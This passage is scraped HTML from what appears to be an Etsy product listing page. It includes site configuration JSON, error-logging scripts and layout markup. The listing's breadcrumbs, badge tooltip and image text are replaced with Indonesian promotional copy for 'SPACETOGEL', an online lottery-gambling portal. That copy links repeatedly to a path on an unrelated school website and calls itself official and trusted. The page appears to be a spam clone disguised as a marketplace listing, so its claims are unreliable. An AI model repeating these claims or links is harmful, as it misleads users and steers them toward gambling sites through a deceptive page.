)?\\d{3}","postal_code_placeholder":"","country_iso_code":"OM"},"169":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"PK"},"284":{"postal_code_type":"zip","postal_code_pattern":"(969(?:39|40))(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"PW"},"173":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}","postal_code_placeholder":"","country_iso_code":"PG"},"178":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"PY"},"171":{"postal_code_type":"Postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"PE"},"172":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"PH"},"174":{"postal_code_type":"postal","postal_code_pattern":"\\d{2}-\\d{3}","postal_code_placeholder":"10-345","country_iso_code":"PL"},"177":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}-\\d{3}","postal_code_placeholder":"1000-205","country_iso_code":"PT"},"175":{"postal_code_type":"zip","postal_code_pattern":"(00[679]\\d{2})(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"PR"},"304":{"postal_code_type":"postal","postal_code_pattern":"9[78]4\\d{2}","postal_code_placeholder":"","country_iso_code":"RE"},"180":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"RO"},"181":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"101000","country_iso_code":"RU"},"308":{"postal_code_type":"postal","postal_code_pattern":"9[78][01]\\d{2}","postal_code_placeholder":"","country_iso_code":"BL"},"286":{"postal_code_type":"postal","postal_code_pattern":"(?:ASCN|STHL) 1ZZ","postal_code_placeholder":"","country_iso_code":"SH"},"288":{"postal_code_type":"postal","postal_code_pattern":"9[78][01]\\d{2}","postal_code_placeholder":"","country_iso_code":"MF"},"289":{"postal_code_type":"postal","postal_code_pattern":"9[78]5\\d{2}","postal_code_placeholder":"","country_iso_code":"PM"},"249":{"postal_code_type":"Postal","postal_code_pattern":"VC\\d{4}","postal_code_placeholder":"","country_iso_code":"VC"},"291":{"postal_code_type":"postal","postal_code_pattern":"4789\\d","postal_code_placeholder":"","country_iso_code":"SM"},"183":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"SA"},"185":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"SN"},"189":{"postal_code_type":"postal","postal_code_pattern":"\\d{5,6}","postal_code_placeholder":"","country_iso_code":"RS"},"220":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"SG"},"191":{"postal_code_type":"postal","postal_code_pattern":"\\d{3} ?\\d{2}","postal_code_placeholder":"","country_iso_code":"SK"},"192":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"SI"},"188":{"postal_code_type":"postal","postal_code_pattern":"[A-Z]{2} ?\\d{5}","postal_code_placeholder":"","country_iso_code":"SO"},"215":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"ZA"},"294":{"postal_code_type":"postal","postal_code_pattern":"SIQQ 1ZZ","postal_code_placeholder":"","country_iso_code":"GS"},"136":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"KR"},"99":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"28013","country_iso_code":"ES"},"142":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"LK"},"184":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"SD"},"295":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"SJ"},"194":{"postal_code_type":"postal","postal_code_pattern":"[HLMS]\\d{3}","postal_code_placeholder":"","country_iso_code":"SZ"},"193":{"postal_code_type":"postal","postal_code_pattern":"^\\d{5}$","postal_code_placeholder":"111 22","country_iso_code":"SE"},"80":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"CH"},"204":{"postal_code_type":"postal","postal_code_pattern":"\\d{3}(?:\\d{2,3})?","postal_code_placeholder":"","country_iso_code":"TW"},"199":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"TJ"},"205":{"postal_code_type":"postal","postal_code_pattern":"\\d{4,5}","postal_code_placeholder":"","country_iso_code":"TZ"},"198":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"TH"},"164":{"postal_code_type":"postal","postal_code_pattern":"[1-9]\\d{3} ?(?:[A-RT-Z][A-Z]|S[BCE-RT-Z])","postal_code_placeholder":"1105 AW","country_iso_code":"NL"},"202":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"TN"},"203":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"TR"},"200":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"TM"},"299":{"postal_code_type":"postal","postal_code_pattern":"TKCA 1ZZ","postal_code_placeholder":"","country_iso_code":"TC"},"207":{"postal_code_type":"postal","postal_code_pattern":"^([0-8][0-9]{4}|9[0-3][0-9]{3}|94[0-8][0-9]{2}|949[0-8][0-9]|9499[0-9])$","postal_code_placeholder":"","country_iso_code":"UA"},"105":{"postal_code_type":"postal","postal_code_pattern":"^(GIR ?0AA|((AB|AL|B|BA|BB|BD|BF|BH|BL|BN|BR|BS|BT|BX|CA|CB|CF|CH|CM|CO|CR|CT|CV|CW|DA|DD|DE|DG|DH|DL|DN|DT|DY|E|EC|EH|EN|EX|FK|FY|G|GL|GY|GU|HA|HD|HG|HP|HR|HS|HU|HX|IG|IM|IP|IV|JE|KA|KT|KW|KY|L|LA|LD|LE|LL|LN|LS|LU|M|ME|MK|ML|N|NE|NG|NN|NP|NR|NW|OL|OX|PA|PE|PH|PL|PO|PR|RG|RH|RM|S|SA|SE|SG|SK|SL|SM|SN|SO|SP|SR|SS|ST|SW|SY|TA|TD|TF|TN|TQ|TR|TS|TW|UB|W|WA|WC|WD|WF|WN|WR|WS|WV|YO|ZE)(\\d[\\dA-Z]? ?\\d[ABD-HJLN-UW-Z]{2}))|BFPO ?\\d{1,4})$","postal_code_placeholder":"NW1 6XE","country_iso_code":"GB"},"209":{"postal_code_type":"zip","postal_code_pattern":"^\\d{5}(?:-\\d{4})?$","postal_code_placeholder":"12345","country_iso_code":"US"},"302":{"postal_code_type":"zip","postal_code_pattern":"96898","postal_code_placeholder":"","country_iso_code":"UM"},"208":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"UY"},"248":{"postal_code_type":"zip","postal_code_pattern":"(008(?:(?:[0-4]\\d)|(?:5[01])))(?:[ \\-](\\d{4}))?","postal_code_placeholder":"","country_iso_code":"VI"},"210":{"postal_code_type":"postal","postal_code_pattern":"\\d{6}","postal_code_placeholder":"","country_iso_code":"UZ"},"211":{"postal_code_type":"postal","postal_code_pattern":"\\d{4}","postal_code_placeholder":"","country_iso_code":"VE"},"212":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}\\d?","postal_code_placeholder":"","country_iso_code":"VN"},"224":{"postal_code_type":"postal","postal_code_pattern":"986\\d{2}","postal_code_placeholder":"","country_iso_code":"WF"},"213":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"EH"},"217":{"postal_code_type":"postal","postal_code_pattern":"\\d{5}","postal_code_placeholder":"","country_iso_code":"ZM"}},"ship_to_preference_capabilities":{"209":{"postal_code":{"is_assignable":true,"is_required":true}},"79":{"postal_code":{"is_assignable":true,"is_required":true}},"122":{"postal_code":{"is_assignable":true,"is_required":true}},"61":{"postal_code":{"is_assignable":true,"is_required":true}},"105":{"postal_code":{"is_assignable":true,"is_required":true}}},"category_id":68887416,"admin_tools_page_data":[],"currency_data":{"currency_id":826,"code":"GBP","name":"British Pound","number_precision":2,"symbol":"\u00a3","listing_enabled":true,"browsing_enabled":true,"buyer_location_restricted":false,"rate_updates_enabled":true},"machine_translation\/listings_click_to_translate":true,"ads.prolist\/log_clicks_and_impressions":false,"mfg\/dovetail":true,"mfg\/buyer_facing_dovetail":true,"searchx\/4q18\/dwell_time_as_backend_event":false,"is_regulatory_buyer_disclosure_enabled":true,"is_convos_condensed_disclosure_enabled":false,"machine_translation":{"mode":"disabled","listing_id":4302118744,"to_lang_code":"en-US","from_lang_code":"en-US","translated":null,"untranslated":null,"category_tags":null},"listing_fee":20,"presented_listing_fee":"$0.20 USD","listing_period_months":4,"apple_pay_api_version_number":12,"render_is_gift_section":true,"coupons_in_buy_box_is_enabled":false,"is_eligible_web_components":false,"should_show_atc_from_listing_cards":true,"should_show_atc_from_listing_cards_mweb":false,"added_to_cart_text":"Added to cart!","speculation_rules_prefetch":false,"speculation_rules_prefetch_from_search":false,"prefetch_event_cache_key":"","should_show_sidebar_cart_post_atc_recs":false,"is_eligible_for_trust_suite_section":false,"is_gift_guide_flyout_enabled":false,"should_hide_sub_nav":true,"should_show_breadcrumbs":true,"listing_image_url":"","eligible_for_mini_collections_and_ignore_menu":false,"image_ids_by_listing_variation_ids":[],"should_show_scrollable_thumbnails":true,"should_show_video":true,"shouldShowThumbnails":true,"carousel_height_percentage_relative_to_width":[80,80,80,80,80,80,80,80,80,80],"is_mobile_experience":false,"is_users_own_listing":false,"listing_sale_price_is_gamed":false,"lp_toffers_v2_true_sale_enabled":false,"sale_ending_soon_countdown":true,"should_show_histogram_panel":false,"anchor_shop_name_to_seller_cred":false,"shop_reviews_count":62595,"neu_buy_box_type":"offerings","listing_id":4302118744,"klarna_osm_js":"https:\/\/js.klarna.com\/web-sdk\/v1\/klarna.js","is_eligible_for_klarna_osm":false,"is_eligible_for_variations_update":true,"can_listing_have_coupon_applied":false,"quantity_submodule_enabled":true,"is_multiple_questions_enabled_buyer":true,"personalization_is_required":true,"personalization_field_count":1,"how_its_made_label_type":"seller_designed","product_details_content_toggle_selector":"[data-wt-content-toggle][aria-controls='content-toggle-product-details-read-more']","should_show_description_content_toggle":true,"use_shipping_variant_view":true,"shipping_section_default_open":true,"shipping_and_returns_is_eligible_for_sticky_buy_box":true,"estimated_shipping_is_eligible_for_sticky_buy_box":true,"is_eligible_for_shipping_and_returns_cleanup":true,"is_postal_code_empty_on_initial_load":true,"invalid_postal_codes":{"209":["000","001","002","003","004","213","269","343","345","348","353","419","428","429","517","518","519","529","533","536","552","568","569","578","579","589","621","632","642","643","659","663","682","694","695","696","697","698","699","702","709","715","732","742","771","817","818","819","839","848","849","854","858","861","862","866","867","868","869","872","886","887","888","892","896","899","909","929","987"]},"is_eligible_for_policies_in_overlay":true,"active_tab":"same_listing_reviews","allow_reviews_debug":false,"using_mweb_tabs":false,"load_tabbed_layout_js":true,"should_show_helpful_count":true,"should_default_chronological_sort":false,"should_include_subratings":true,"current_page":1,"is_deep_dive":false,"has_appreciation_photos":true,"eligible_for_review_photo_filter_and_sort":true,"is_new_deep_dive":false,"photos_per_page":4,"review_categorical_tags_enabled":true,"review_hide_sort_by_prefix":true,"mweb_can_scroll_to_seller_cred_module":false,"is_eligible_for_showing_more_items_on_explore_more":false,"structured_policies_messages":{"module_name":"Shop policies","last_updated_on":"Last updated on","publish":"Publish Shop Policies","policies_save":"Save policies","policies_edit":"Edit policies","cancel":"Cancel","revert":"Use previous policies","edit":"Edit","loading":"Loading","preview_banner_kicker":"Policies preview","not_existing_policies_preview_banner_header":"Review and customize these policies so they work for you","preview_banner_body":"You can publish these to your shop or edit them if you need to make changes","preview_publish_confirm":"By clicking Publish, you'll post your Shop Policies and agree to comply with them.","revert_confirm":"Are you sure you want to revert?","leave_page_warning":"You are currently editing shop policies","private_receipt_info_title":"Private receipt info","private_receipt_info_body":"We have removed the 'Private Receipt Info' section of your policies page. You don't need to populate this section for the purposes of complying with international consumer protection laws anymore because this new Policies feature will automatically display the relevant content of your shop policies within the buyer receipt email instead.","private_receipt_info_link":"See this FAQ for more information","structured_banner_title":"Switch to simple shop policies","structured_banner_title_v2":"Set up simple shop policies","structured_banner_body":"We'll give you a quick template to create your shop policies in seconds.","structured_banner_button":"Try it now","new_simplified_policies":"Your new, simplified policies","new_policies_banner_description_1":"Buyers prefer policies that are short, clear and address their key concerns, so we've designed them that way.","new_policies_banner_description_2":"Review and customize these policies so they work for you. We've saved your previous policies, so you can always switch back.","new_policies_banner_description_3":"We've saved your previous policies, so you can always switch back.","new_policies_banner_learn_more":"Learn more","publish_policies_success":"Your new policies have been published!","publish_policies_error":"There was an error publishing your policies. Please try again.","policies_failed_to_load":"Shop policies failed to load","policies_try_again":"Try again","policies_saving":"Saving...","policies_publishing":"Publishing...","listing_preview_shipping":"This section will show shipping or download information once you publish your listing.","craft_shipping_section_title":"Shipping & policies","craft_payments_section_title":"Payments","craft_refunds_section_title":"Returns & exchanges","craft_terms_section_title":"Terms & conditions","craft_more_details_accordion_label":"+ See more...","listing_returns_and_exchanges":"See item details for return and exchange eligibility.","no_policies":"Looks like this shop doesn't have any custom policies. Have questions?","message_the_seller":"Message the seller","shipping_section_title":"Shipping","payments_section_title":"Payments","refunds_section_title":"Returns & exchanges","digital_section_title":"Downloads","terms_section_title":"Terms & conditions","more_details_accordion_label":"See more...","seller_details_section_title":"More information"},"shop_policy_selector":"[data-content-toggle-uid=shop_policies]","load_user_faves_option":true,"update_many_faves_option":true,"is_async_only_faves_option":false,"guest_favorites_enabled":true,"collection_count":0,"favorites_key":"","use_clearer_privacy_description":true,"conditional_sale_interstitial":true,"google_client_id":"296956783393-2d8r0gljo87gjmdpmvkgbeasdmelq33e.apps.googleusercontent.com","show_one_tap_modal":false,"is_google_one_tap_cart_page":false});
        })();
    </script>

        <script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">__webpack_public_path__ = "https://www.etsy.com/ac/evergreenVendor/js/en-US/";</script>

    <script src="https://js.sentry-cdn.com/ba12d66291e647788d8a9f0878043603.min.js" crossorigin="anonymous" nonce="+gWSoSeB7oJ/5IB7H6o53UJw"></script>
<script nonce="+gWSoSeB7oJ/5IB7H6o53UJw">(function() {
var asyncAvailable = true;
try {
    eval("async () => {}");
} catch(e) {
    asyncAvailable = false;
}

var falseUA = true && !asyncAvailable;
var primarySupportsAsync = !true && asyncAvailable;

var clientloggerIsEnabled = true;
if (clientloggerIsEnabled) {
    if (falseUA) {
        new Image().src = '/clientlog?falseua=1';
    }
    if (primarySupportsAsync) {
        new Image().src = '/clientlog?primarysupportsasync=1';
    }
    if (window.__etsy_logging && window.__etsy_logging.bots && (window.__etsy_logging.bots.isBot || window.__etsy_logging.bots.botCheck.length > 0)) {
        new Image().src = '/clientlog?feisbot=1&bot_check=' + encodeURIComponent(JSON.stringify(window.__etsy_logging.bots.botCheck));
    }
}

    if (typeof Sentry !== 'object') { return; }

    function breadcrumbFilter (arr_xhr, arr_console) {
        return function (crumb) {
            if (typeof crumb === 'object') {
                if (crumb.category === 'xhr'
                    && typeof crumb.data === 'object'
                    && typeof crumb.data.url === 'string') {
                    return !arr_xhr.some(function (re) {
                        return crumb.data.url.match(re);
                    }) && crumb;
                } else if (crumb.category === 'console'
                           && typeof crumb.message === 'string') {
                    return !arr_console.some(function (re) {
                        return crumb.message.match(re);
                    }) && crumb;
                }
            }
            return crumb;
        };
    }

    function beforeSend(event, hint) {
        try {
            if (hint.originalException.detail.reason.message === 'Extension context invalidated.') {
                return null;
            }
        } catch(_ignore) {
        }

        var serverUA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36".trim();
        var browserUA = navigator.userAgent.trim();
        var mismatch = serverUA !== browserUA;

        if (mismatch) {
            return null;
        }

        if (falseUA) {
            return null;
        }

        event.request = event.request || {};
        event.request.headers = event.request.headers || {};
        event.extra = event.extra || {};

        event.request.headers["User-Agent"] = serverUA;
        event.extra["browser_side_user_agent"] = browserUA;

        if (window.__etsy_logging && window.__etsy_logging.bots && window.__etsy_logging.bots.isBot) {

            return null;
        }

        return event;
    }
    Sentry.onLoad(function() {
        var options = {
            release: 'ed238592a490b126-prod',
            environment: 'Production',
            autoSessionTracking: false,
            beforeSend: beforeSend,
            beforeBreadcrumb: breadcrumbFilter([/lalocandadinonnaflo.com\/es\/\/bcn\/beacon$/i, /\/icht.etsysecure.com\//i], [/https\:\/\/www\.salvatorespizzeriarestaurant\.com\/careers/]),
            ignoreErrors: ["top.GLOBALS", /https\:\/\/www\.youtube\.com/, /undefined is not an object.*dataLayerTransactions.length/, /https\:\/\/tpc\.googlesyndication\.com/, /http\:\/\/fairytrade\.co\.uk/, /http\:\/\/100actsofsewing\.com/, /https\:\/\/www\.nobiggie\.net/, /staticxx\.facebook\.com/, /__firefox__/, /JSON syntax error/, /https\:\/\/bid\.g\.doubleclick\.net/, /https\:\/\/5094987\.fls\.doubleclick\.net/, /https\:\/\/www\.google\.com/, /https\:\/\/www\.zenaps\.com/, /Cannot read property.*DOMNodeInsertedByJs/, /e.tagName.toLowerCase/, /twttr/, /PAPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX/, /Error calling method on NPObject/, /Access is denied./, /document\.getElementsByClassName\.ToString/, /https\:\/\/accounts\.google\.com/, /_isMatchingDomain/, /NS_ERROR_NOT_INITIALIZED/, /loginFormData\.userNameValue/, /find variable: \$pr/, /\$pr is not defined/, /find variable: _AutofillCallbackHandler/],
            allowUrls: [/etsystatic\.com/, /etsy\.com\/paula/, /etsy\.com\/d?ac/, /etsy\.com\/daj/, /etsycorp\.com/, /etsycloud\.com/],
            denyUrls: [],
            sampleRate: 1.0,
        };


        Sentry.init(options);

        var hasViteAsset = Array.from(document.scripts).find(function (script) {
            return /\/[a-z]+[vV]ite\//.test(script.src);
        });

        Sentry.configureScope(function(scope) {
            scope.setUser({"id":"uj0nemGYfZm0u5UhoRQWjT5qMRzf","ip_address":"202.126.110.18"});
            scope.setTags({"user_id":null,"is_signed_in":false,"is_web_view":false,"is_atlas_request":false,"request_uuid":"EunhLnzL4sAYJypZdeOPahA2o_53","locale":"en-US","build_variant":"evergreenVendor","polyfill":"paula","neu_runtime_tracing":"off","fullstory":"off","speedcurve_lux":"off","primary_event_name":"view_listing"});
            scope.setExtras({"server_side_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/139.0.0.0 Safari/537.36"});
            scope.setTag('has_vite_asset', hasViteAsset ? 'true' : 'false');
        });

        window.__etsy_logging.errorQueue.forEach(function(errorData) {
            if (errorData[4]) {
                Sentry.captureException(errorData[4]);
            }
        });
    });
})();</script>

   <script src="https://www.etsy.com/ac/evergreenVendor/js/en-US/vendor_bundle.4b28aa70c9cca35746a4.js" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer></script>
   <script src="https://www.etsy.com/ac/evergreenVendor/js/en-US/etsy_libs.80be4aa737e18e6d1fe5.js" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer></script>
   <script src="https://www.etsy.com/paula/v3/polyfill.min.js?etsy-v=v5&flags=gated&features=AbortController%2CDOMTokenList.prototype.@@iterator%2CDOMTokenList.prototype.forEach%2CIntersectionObserver%2CIntersectionObserverEntry%2CNodeList.prototype.@@iterator%2CNodeList.prototype.forEach%2CObject.preventExtensions%2CString.prototype.anchor%2CString.raw%2Cdefault%2Ces2015%2Ces2016%2Ces2017%2Ces2018%2Ces2019%2Ces2020%2Ces2021%2Ces2022%2Cfetch%2CgetComputedStyle%2CmatchMedia%2Cperformance.now" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer>
   <script src="https://www.etsy.com/ac/evergreenVendor/js/en-US/app-shell/globals/index.a102ed4d03005c7067f5.js" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer></script>
   <script src="https://www.etsy.com/ac/evergreenVendor/js/en-US/@etsy-modules/ConsentManagement/Transcend-Integration.5952c095cb0676fe13c9.js" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer></script>
   <script src="https://www.etsy.com/ac/evergreenVendor/js/en-US/bootstrap/listings3/main.125161e9593a75b27a7b.js" type="text/javascript" nonce="+gWSoSeB7oJ/5IB7H6o53UJw" crossorigin defer></script>

        <main id="content">
            <div data-ui="listing-breadcrumbs" class="wt-hide-xs wt-show-lg breadcrumb_nav">
    <div data-ui="cat-nav" id="desktop-category-nav" class="cat-nav  v2-toolkit-cat-nav wt-ml-xs-0 wt-mr-xs-0">
        <div class="wt-text-caption wt-position-relative wt-z-index-5 wt-pt-xs-2">
                <div class="wt-grid wt-body-max-width wt-pl-xs-2 wt-pr-xs-2 wt-pl-md-4 wt-pr-md-4 wt-pl-lg-6 wt-pr-lg-6">
                <ul class="wt-list-unstyled wt-grid__item-xs-12 wt-body-max-width wt-display-flex-xs wt-justify-content-center" data-menu-ui="menubar" data-ui="top-nav-category-list">
                        <li data-ui="list-item-breadcrumbs" class="top-nav-item wt-sem-text-primary wt-text-body-small--tight wt-pb-xs-2">
                            <a data-breadcrumb-link data-menu-ui="menuitem" tabindex="0" href="https://ppschool.org.in/stella/">SPACETOGEL</a>
                                <span class="etsy-icon arrow-separator wt-sem-text-primary wt-icon--smallest-xs"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M8 21a1 1 0 0 1-.664-1.747l8.164-7.254-8.164-7.252a1 1 0 0 1 1.328-1.494L18.5 12l-9.836 8.747A1 1 0 0 1 8 21"/></svg></span>
                        </li>
                        <li data-ui="list-item-breadcrumbs" class="top-nav-item wt-sem-text-primary wt-text-body-small--tight wt-pb-xs-2">
                            <a data-breadcrumb-link data-menu-ui="menuitem" tabindex="0" href="https://ppschool.org.in/stella/">SPACETOGEL AKSES</a>
                        </li>
                           <pre> | </pre> 
                         </li>   
                            <li data-ui="list-item-breadcrumbs" class="top-nav-item wt-sem-text-primary wt-text-body-small--tight wt-pb-xs-2">
                            SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia
                        </li>
                </ul>
                <span class="active-nav-item-indicator wt-position-absolute wt-display-inline-block" data-ui="active-nav-item-indicator"></span>
        </div>
        </div>
    </div>
</div>



<div data-selector="listing-page-content" class="content-wrap listing-page-content">

    

    

    <div class="wt-pt-xs-5 listing-page-content-container-wider wt-horizontal-center">

        <div id="listing-right-column" class="listing-buy-box-experiment">

            <div>
                <div class="body-wrap wt-body-max-width wt-display-flex-md wt-flex-direction-column-xs">
                    <div class="image-col wt-order-xs-1 wt-mb-xs-2 wt-mb-lg-6 wt-pl-md-4 wt-pl-lg-5 wt-pl-xs-2 wt-pr-xs-2 wt-pr-xl-2 wt-pr-md-4 wt-pr-lg-0">
                        <div class="wt-flex-lg-6 wt-mr-lg-3 wt-pr-xl-3">
                            <div class="image-wrapper wt-position-relative carousel-container-responsive" id="photos">
    

        <div data-listing-page-badge
            style="margin-left: 78px; "
            class="wt-position-absolute wt-z-index-2 wt-position-top wt-position-left wt-mt-xs-1"
        >
            <div class="wt-popover" data-wt-popover>
    <button data-wt-popover-trigger
            class="wt-popover__trigger wt-popover__trigger--underline wt-display-inline-flex-xs wt-align-items-center wt-text-caption"
            aria-disabled="true"
            aria-describedby="etsys_pick"
    >
<span data-clg-id="WtBadge" class="wt-badge wt-badge--statusRecommendation wt-pl-xs-2">
                <span class="wt-icon wt-icon--smaller-xs wt-nudge-r-3"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="m15.4 14.1-3.7-1.9-1.8-3.6c-.3-.7-1.4-.7-1.8 0l-1.9 3.7-3.7 1.9c-.3.1-.5.4-.5.8q0 .6.6.9l3.7 1.9 1.9 3.7c.1.3.4.5.8.5q.6 0 .9-.6l1.9-3.7 3.7-1.9c.3-.2.6-.5.6-.9s-.3-.6-.7-.8m6-8L19 4.9l-1.2-2.4c-.3-.7-1.4-.7-1.8 0l-1.2 2.4-2.4 1.2c-.2.2-.4.5-.4.9q0 .6.6.9L15 9.1l1.2 2.4c.2.3.5.6.9.6q.6 0 .9-.6l1.2-2.4 2.4-1.2c.2-.2.4-.5.4-.9q0-.6-.6-.9"/></svg></span>SPACETOGEL

</span>
    </button>
    <div id="etsys_pick" role="tooltip">
        Di tengah semakin berkembangnya dunia hiburan online, SPACETOGEL hadir sebagai salah satu link toto togel resmi yang banyak dicari oleh para pecinta togel online. Dengan reputasi yang terus meningkat, SPACETOGEL dikenal sebagai portal yang menghubungkan pemain ke 10 situs togel terpercaya tahun 2026 dengan sistem aman, transparan, dan pelayanan profesional. <p class="wt-mt-xs-3"><a href="https://ppschool.org.in/stella/" target="_blank"> SPACETOGEL </a></p>
    </div>
</div>
        </div>

    
        <button
            class="btn--focus  wt-position-absolute wt-btn wt-btn--light wt-btn--small wt-z-index-2 wt-btn--filled wt-btn--icon wt-btn--fixed-floating wt-position-right wt-mr-xs-2 wt-mt-xs-2"
            data-ui="favorite-listing-button"
            data-listing-id="4302118744"
            data-accessible-btn-fave
            data-favorite-label="Add to Favorites"
            data-favorited-label="Remove from Favorites"
            
            
            data-always-show="true"
            
            
            
        >
            <div class="favorite-listing-button-icon-container should-animate "
                 data-source="lp_image_carousel" 
                data-btn-fave
                data-neu-fave
                data-favorite-icon-container
            >
                <span class="etsy-icon wt-nudge-t-1&#10;                    &#10;                    &#10;                        &#10;                        &#10;                            wt-display-block&#10;                        &#10;                    " data-not-favorited-icon=""><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path fill-rule="evenodd" clip-rule="evenodd" d="M20.877 12.52q.081-.115.147-.239A6 6 0 0 0 12 4.528a6 6 0 0 0-9.024 7.753q.066.123.147.24l.673.961a6 6 0 0 0 .789.915L12 21.422l7.415-7.025q.44-.418.789-.915zm-14.916.425L12 18.667l6.04-5.722q.293-.279.525-.61l.673-.961a.3.3 0 0 0 .044-.087 4 4 0 1 0-7.268-2.619v.003L12 8.667l-.013.004v-.002l-.006-.064a3.98 3.98 0 0 0-1.232-2.51 4 4 0 0 0-6.031 5.193q.014.045.044.086l.673.961a4 4 0 0 0 .526.61"/></svg></span>
                <span class="etsy-icon wt-nudge-t-1 wt-text-favorite-heart&#10;                    &#10;                    &#10;                        &#10;                        &#10;                            wt-display-none&#10;                        &#10;                    " data-favorited-icon=""><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" aria-hidden="true" focusable="false"><path d="M21.024 12.281a2 2 0 0 1-.147.24l-.673.961q-.349.497-.789.915L12 21.422l-7.415-7.025a6 6 0 0 1-.789-.915l-.673-.961a2 2 0 0 1-.147-.24A6 6 0 0 1 12 4.528a6 6 0 0 1 9.024 7.753"/></svg></span>
            </div>
            <span aria-hidden="true" class="icon"></span>
            <span class="wt-screen-reader-only" data-a11y-label>
                
                Add to Favorites
            </span>
            </button>
        
    

    <div class="listing-page-image-carousel-component wt-display-flex-xs"
        data-component="listing-page-image-carousel"
        data-palette-listing-id="4302118744"
        data-shop-id="25947065"
    >

    <div class="image-carousel-container wt-position-relative wt-flex-xs-6 wt-order-xs-2
                
                show-scrollable-thumbnails">

        <ul class="wt-list-unstyled wt-overflow-hidden wt-position-relative carousel-pane-list"
            style="padding-top: 80%;"
            data-carousel-pane-list
            tabindex="0">
                    <li class=" wt-position-absolute wt-width-full wt-height-full wt-position-top wt-position-left carousel-pane"
                        data-carousel-pane
                        data-index="0"
                        data-image-id="6845617078"
                        data-palette-listing-image
                    >
                        <img class="wt-max-width-full wt-horizontal-center wt-vertical-center carousel-image wt-rounded"
                            alt="SPACETOGEL🪐Bandar Togel Terpercaya Link Bo Togel Resmi WLA Terbesar No#1 Di Indonesia image 1"
                            data-carousel-first-image
                            data-perf-group="main-product-image"
                            src="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                            srcset="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                            fetchpriority="high"
                            data-original-image-width="3000"
                            data-src-zoom-image="https://res.cloudinary.com/dv9tdwkcd/image/upload/v1764031399/SPACE-SLIDER-1-min_acbkuj.jpg"
                            data-index="0"
                        />
                    </li>
                        <li class="wt-display-none wt-position-absolute wt-width-full wt-height-full wt-position-top wt-position-left carousel-pane no-zoom"
                            data-carousel-pane
                            data-video-pane
                            data-no-zoom
                            data-index="1"
                        >
                            <div class="wt-width-full wt-height-full">
                                
                         <div data-clg-id="WtSpinner" class="wt-spinner wt-spinner--02 wt-mt-xs-0 wt-vertical-center wt-display-none" aria-live="assertive" data-video-loading-icon="" aria-hidden="true">
                             <span class="wt-icon"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 48 48" aria-hidden="true" focusable="false"><circle fill="transparent" cx="24" cy="24" r="21"/></svg></span>
                             Loading
                         </div>

                                
                                <div
                                    class="video-play-overlay wt-display-none"
                                    data-video-play-overlay
                                >
                                    <div
